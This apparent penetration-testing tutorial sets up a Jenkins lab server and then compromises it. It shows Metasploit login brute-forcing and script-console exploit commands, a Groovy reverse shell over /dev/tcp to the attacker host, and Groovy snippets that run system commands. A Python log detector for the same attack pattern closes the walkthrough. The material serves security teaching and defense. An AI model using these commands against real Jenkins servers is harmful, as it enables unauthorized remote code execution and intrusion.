Jenkins Penetration Testing
Contents
Introduction
Lab Setup
Installation
Configuration
Enumeration
Exploitation using Metasploit Framework:
Exploiting Manually (Reverse Shell)
Executing Shell Commands Directly
Conclusion
Introduction
Jenkins Penetration Testing is essential for identifying security vulnerabilities in Jenkins, an open-source
automation server used for continuous integration (CI) and continuous delivery (CD). Built on
Java, Jenkins utilizes a scripting platform to automate tasks such as building, testing, and deployment
in the software development lifecycle. This automation accelerates development cycles, enhances
code quality, and streamlines releases. Key features include CI/CD pipelines, automated testing,
integration with version control systems, extensibility via plugins, and robust monitoring and
reporting capabilities.
Lab Setup
In this article, we are going to set up the Jenkins server on the Ubuntu machine and obtain
remote code execution. The machines are as follows:
Target Machine: Ubuntu (192.168.1.4)
Attacker Machine: Kali Linux (192.168.1.7)
Installation
For Jenkins to function, it necessitates the Java Runtime Environment (JRE). In this guide, we'll utilize
OpenJDK to establish the Java environment. OpenJDK's development kit incorporates JRE within its
framework.
apt install openjdk-11-jdk
At times, the default Ubuntu repository may lack the latest Jenkins version. Therefore, we suggest
opting for the project-maintained repository to access the most recent features and patches.
To integrate the Jenkins repository into the Ubuntu system, adhere to the following:
Begin by importing the GPG key to ensure package integrity.
sudo curl -fsSL https://pkg.jenkins.io/debian-stable/jenkins.io-2023.key | sudo tee \
  /usr/share/keyrings/jenkins-keyring.asc > /dev/null
Following that, incorporate the Jenkins repository and append the authentication key to the source
list using the command provided below:
echo "deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc] https://pkg.jenkins.io/debian-stable binary/" | \
  sudo tee /etc/apt/sources.list.d/jenkins.list > /dev/null
Now we can proceed with the Jenkins installation on the Ubuntu machine.
apt install jenkins
After installation is complete, Jenkins can be started using the following command:
systemctl start jenkins
Status can be checked using the following command:
systemctl status jenkins
Configuration
After installation, Jenkins needs to be configured. Browsing to the service running on port
8080 shows that the Jenkins server requires an Administrator password.
The password can be obtained by reading the content of the initialAdminPassword file.
cat /var/lib/jenkins/secrets/initialAdminPassword
On the Customize Jenkins page, select Install suggested plugins and proceed with the installation.
The final step requires the creation of the First Admin User username and password. Here we are using
the username raj and the password 123.
Finally, enter the URL used to access the Jenkins server. The URL can be entered as
http://127.0.0.1:8080/ as we want to set up the server on the Ubuntu machine.
Enumeration
After successfully installing and configuring the Jenkins server, we can start the exploitation using the
Kali machine. We start with enumeration: since the Jenkins server is running on port 8080 of the
Ubuntu machine, we check that port first. At port 8080 there is a Jenkins login page which
requires credentials.
Exploitation using Metasploit Framework:
Since the login page requires credentials, we can use the auxiliary module available in the Metasploit
Framework to check for a valid username and password to log in. The auxiliary module we will be
using requires a username file and a password file.
In CTF scenarios, you can use the common usernames list (SecLists -
Names) as the username file and rockyou.txt as the password file. However, we use a custom dictionary here to make
the scanning process easier. You can execute the following commands inside the Metasploit
Framework:
use auxiliary/scanner/http/jenkins_login
set rhosts 192.168.1.4
set rport 8080
set targeturi /
set user_file users.txt
set pass_file passwords.txt
set verbose false
exploit
Next, observe that the username and password have been enumerated successfully. Afterwards,
use these credentials to exploit the target. You can use the exploit located at
exploit/multi/http/jenkins_script_console. Use the following Metasploit commands to run the
exploit:
use exploit/multi/http/jenkins_script_console
show targets
set target 1
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 192.168.1.4
set rport 8080
set targeturi /
set username raj
set password 123
exploit
Observe that the reverse shell has been obtained after the exploit has been successfully executed.
Exploiting Manually (Reverse Shell)
To proceed with manual exploitation, you need the username and password of the Jenkins Console.
Assuming the attacker has already discovered the credentials through brute forcing or any other
method, they can log into the console successfully.
Once logged in using the previously discovered credentials (raj:123) from the auxiliary module, you
can access the Manage Jenkins functionality, which includes the Script Console.
In Jenkins, Groovy serves as the main scripting language for defining jobs and
pipelines. Groovy, being dynamic and operating on the Java Virtual Machine (JVM), seamlessly
integrates with Jenkins, which is predominantly Java-based. Therefore, we are going to use the
Groovy reverse shell script to obtain the reverse shell. The command for the Groovy reverse shell can
be obtained from the following URL: https://www.revshells.com by selecting the Groovy script
payload.
Now, use the above Groovy reverse shell script in the Jenkins Script Console. Before running the
script, make sure to start the netcat listener at port 443 on the Kali machine using the following
command:
rlwrap nc -lnvp 443
Finally, the reverse shell is obtained at port 443 after running the above Groovy script.
An alternate way to get the reverse shell is to run the following script in the Script Console:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/192.168.1.7/443; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Make sure to start the listener at port 443 before running the script.
Observe that the reverse shell is obtained at port 443 after the execution of the script.
Executing Shell Commands Directly
There are cases where we don’t have a listener to take the reverse shell. In those cases, we can
directly run the script and obtain the output of the code in the Result window.
The following code is used to get the output of the system commands:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Observe that after you run the script, you can see the output directly in the Result window.
You can use a similar code to get the command output in the Result window:
def proc = "id".execute();
def os = new StringBuffer();
proc.waitForProcessOutput(os, System.err);
println(os.toString());
Observe that after you run the script, you can see the output directly in the Result window.
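For defenders, the sequence shown in this article (a burst of login attempts from the Metasploit auxiliary module, followed by Script Console use) leaves a recognisable trail in HTTP access logs. The following Python is an added example, not part of the original article: it assumes a combined-style access log from a reverse proxy in front of Jenkins and the login endpoints j_spring_security_check / j_acegi_security_check; the sample lines, the host 192.168.1.20 and the thresholds are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: combined-style access log from a reverse proxy in front
# of Jenkins (assumed setup). 192.168.1.7 is the lab's Kali host; .20 is made up.
SAMPLE_LOG = """\
192.168.1.20 - - [10/May/2024:09:58:10 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
192.168.1.20 - - [10/May/2024:09:59:02 +0000] "POST /manage/script HTTP/1.1" 200 8123
192.168.1.7 - - [10/May/2024:10:00:01 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
192.168.1.7 - - [10/May/2024:10:00:01 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
192.168.1.7 - - [10/May/2024:10:00:02 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
192.168.1.7 - - [10/May/2024:10:00:02 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
192.168.1.7 - - [10/May/2024:10:00:03 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
192.168.1.7 - - [10/May/2024:10:03:40 +0000] "POST /script HTTP/1.1" 200 9411
"""

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" \d{3}')
LOGIN_SUFFIXES = ("/j_spring_security_check", "/j_acegi_security_check")
CONSOLE_SUFFIXES = ("/script", "/scriptText")  # also matches /manage/script

def parse(log):
    """Yield (ip, time, method, path-without-query) for each parsable line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, ts, method, path = m.groups()
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            yield ip, when, method, path.split("?")[0].rstrip("/")

def detect(log, threshold=5, window=timedelta(seconds=60)):
    """Flag login bursts per source IP and every Script Console POST."""
    logins, guessers, alerts = defaultdict(list), set(), []
    for ip, when, method, path in parse(log):
        if method != "POST":
            continue
        if path.endswith(LOGIN_SUFFIXES):
            # Keep only attempts inside the sliding window, then add this one.
            logins[ip] = [t for t in logins[ip] if when - t <= window] + [when]
            if len(logins[ip]) >= threshold and ip not in guessers:
                guessers.add(ip)
                alerts.append(("login-burst", ip))
        elif path.endswith(CONSOLE_SUFFIXES):
            # Console POST from an IP that just guessed passwords ranks highest.
            alerts.append(("console-after-burst" if ip in guessers else "console-exec", ip))
    return alerts

if __name__ == "__main__":
    print(*detect(SAMPLE_LOG), sep="\n")
```

Every Script Console POST is reported because the console runs arbitrary Groovy on the controller; the "console-after-burst" label separates the pattern walked through above from routine administrator use.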
Conclusion
In summary, Jenkins Penetration Testing reveals the possibility of using Jenkins servers to gain a
reverse shell, emphasizing the crucial need for strong security practices. Whether due to
compromised logins or no authentication at all, the vulnerability of Jenkins servers shows why we
must take security seriously. It's essential for organizations to enforce strict access rules, conduct
regular security checks, and promptly update systems to reduce the chances of unauthorized access
and misuse.